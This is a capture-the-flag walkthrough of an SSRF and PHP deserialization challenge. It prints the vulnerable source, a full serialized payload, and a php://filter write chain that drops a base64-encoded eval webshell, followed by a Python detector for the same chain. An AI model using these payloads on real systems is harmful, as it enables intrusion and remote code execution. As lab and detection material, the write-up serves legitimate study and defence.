1. Open the environment.
2. Scan with dirsearch and find robots.txt, which points to star1.php.
Because the script trusts REMOTE_ADDR, a request forged through the SSRF endpoint to the local IP 127.0.0.1 is treated as local, which lets us read the source (and, with the write primitive below, arbitrary files).
star1.php:
<?php
error_reporting(0);
// Source is only shown to requests that appear to come from localhost,
// which is exactly what the SSRF endpoint lets us forge.
if ( $_SERVER['REMOTE_ADDR'] == "127.0.0.1" ) {
    highlight_file(__FILE__);
}
$flag='{Trump_:"fake_news!"}';
class GWHT{
    public $hero;
    public function __construct(){
        $this->hero = new Yasuo;
    }
    public function __toString(){
        if (isset($this->hero)){
            return $this->hero->hasaki();
        }else{
            return "You don't look very happy";
        }
    }
}
class Yongen{ //flag.php
    public $file;
    public $text;
    public function __construct($file='',$text='') {
        $this -> file = $file;
        $this -> text = $text;
    }
    // Sink: writes attacker-controlled text to an attacker-controlled path,
    // "protected" only by a die() prefix that a php://filter chain can strip.
    public function hasaki(){
        $d = '<?php die("nononon");?>';
        $a= $d. $this->text;
        @file_put_contents($this-> file,$a);
    }
}
class Yasuo{
    public function hasaki(){
        return "I'm the best happy windy man";
    }
}
?>
Yasuo has to be bypassed: the hero property is overwritten with a Yongen object so that hasaki() reaches the dangerous file_put_contents call. The target path is a php://filter write chain: string.strip_tags removes the PHP tags of the `<?php die("nononon");?>` prefix that hasaki() prepends, the shell is base64-encoded so that strip_tags leaves it intact, and convert.base64-decode then restores it, so the shell is written to disk.
arjun is then used to brute-force the parameter name, which turns out to be c.
payload:
<?php
class GWHT{
    public $hero;
}
class Yongen{ //flag.php
    public $file="php://filter/write=string.strip_tags|convert.base64-decode/resource=shell.php";
    public $text="PD9waHAgQGV2YWwoJF9QT1NUWzFdKTs/Pg==";
}
$b=new GWHT();
$b->hero=new Yongen();// overwrite hero
echo serialize($b);
?>
//path=http://127.0.0.1/star1.php&c=O:4:"GWHT":1:{s:4:"hero";O:6:"Yongen":2:{s:4:"file";s:77:"php://filter/write=string.strip_tags|convert.base64-decode/resource=shell.php";s:4:"text";s:40:"PD9waHAgZXZhbCgkX1BPU1RbJ2NtZCddKTs/Pg==";}}
Connect with AntSword (蚁剑) to get the flag.
Related reference articles:
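A detection check for this chain, added here as an example and not part of the original writeup: it flags request parameters that carry a serialized PHP object, a php://filter write wrapper with decoding filters, or a loopback URL handed to an SSRF parameter. The /index.php endpoint, the sample request targets and the function names are assumptions; the c= payload is the one shown above.

```python
import re
from urllib.parse import unquote, urlparse

# Constructed sample request targets (not taken from any real log).
# /index.php is an assumed SSRF endpoint; the c= value is the writeup's payload.
SAMPLE_TARGETS = [
    '/index.php?path=http://127.0.0.1/star1.php&c=O:4:"GWHT":1:{s:4:"hero";O:6:"Yongen":2:'
    '{s:4:"file";s:77:"php://filter/write=string.strip_tags|convert.base64-decode/resource=shell.php";'
    's:4:"text";s:40:"PD9waHAgZXZhbCgkX1BPU1RbJ2NtZCddKTs/Pg==";}}',
    '/index.php?path=http://127.0.0.1/star1.php',
    '/star1.php?c=hello&path=http://example.com/page',
]

SERIALIZED_OBJECT = re.compile(r'O:\d+:"[A-Za-z_\\][\w\\]*":\d+:\{')   # O:4:"GWHT":1:{
FILTER_WRITE = re.compile(r'php://filter/[^"\s]*write=', re.I)        # write-side wrapper
DECODE_FILTER = re.compile(r'convert\.base64-decode|string\.strip_tags|string\.rot13', re.I)
LOOPBACK = {"127.0.0.1", "localhost", "0.0.0.0", "::1"}

def parse_query(target):
    """Split a request target into (path, [(name, decoded value), ...]).
    Splits on '&' only, so the ';' inside a serialized PHP payload stays intact."""
    path, _, query = target.partition("?")
    params = []
    for pair in filter(None, query.split("&")):
        name, _, value = pair.partition("=")
        params.append((unquote(name), unquote(value)))
    return path, params

def is_loopback_url(value):
    """True if the value is a URL whose host is a loopback address."""
    try:
        host = urlparse(value).hostname
    except ValueError:
        return False
    return bool(host) and (host in LOOPBACK or host.startswith("127."))

def analyze_target(target):
    """Return sorted reasons why a request target matches this attack chain."""
    _, params = parse_query(target)
    reasons = set()
    for name, value in params:
        if SERIALIZED_OBJECT.search(value):
            reasons.add("php_serialized_object_in_param")
        if FILTER_WRITE.search(value):
            reasons.add("php_filter_write_wrapper")
        if DECODE_FILTER.search(value):
            reasons.add("decoding_filter_chain")
        if is_loopback_url(value):
            reasons.add(f"loopback_url_in_{name}")
    return sorted(reasons)

def scan(targets):
    """Return only the flagged targets, each with its list of reasons."""
    return [(t, analyze_target(t)) for t in targets if analyze_target(t)]
```

A single loopback URL in an SSRF parameter is a weaker signal than the full combination; alert on the full chain and log the rest.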